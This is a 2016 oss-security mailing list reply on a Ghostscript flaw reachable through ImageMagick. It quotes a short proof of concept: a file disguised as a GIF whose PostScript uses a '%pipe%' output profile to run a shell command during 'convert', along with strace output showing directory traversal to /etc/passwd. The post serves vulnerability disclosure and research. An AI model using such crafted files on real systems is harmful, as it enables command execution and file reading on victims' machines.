Date: Fri, 30 Sep 2016 15:58:25 -0700 From: Tavis Ormandy <taviso@...gle.com> To: Florian Weimer <fw@...eb.enyo.de> Cc: oss-security@...ts.openwall.com Subject: Re: ImageMagick identify "d:" hangs On Fri, Sep 30, 2016 at 2:11 PM, Florian Weimer <fw@...eb.enyo.de> wrote: > * Tavis Ormandy: >> >> $ cat test.gif >> currentdevice null true mark /OutputICCProfile (%pipe%id > /dev/tty) >> .putdeviceparams >> quit >> $ convert test.gif png:test.png >> >> (Note: I don't know why it doesn't work on earlier versions, maybe >> it's possible to make it work, or some other param will work) > > It still tries to open a file in earlier versions, with directory > traversal: > > [pid 29607] open("/usr/share/ghostscript/9.06/iccprofiles/../../../../../etc/passwd", O_RDONLY) = 5 > > The %pipe%-based execution was introduced as a side effect of: > Thanks Florian! I took a look where that directory comes from, I think it pulls it from a userparam, like: << (ICCProfilesDir) (whatever) >> .setuserparams That probably needs to be fixed. I wonder if there's a way to get that directory to populate back into the PermitFileReading array? Tavis.
Powered by blists - more mailing lists
Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.
Powered by Openwall GNU/*/Linux - Powered by OpenVZ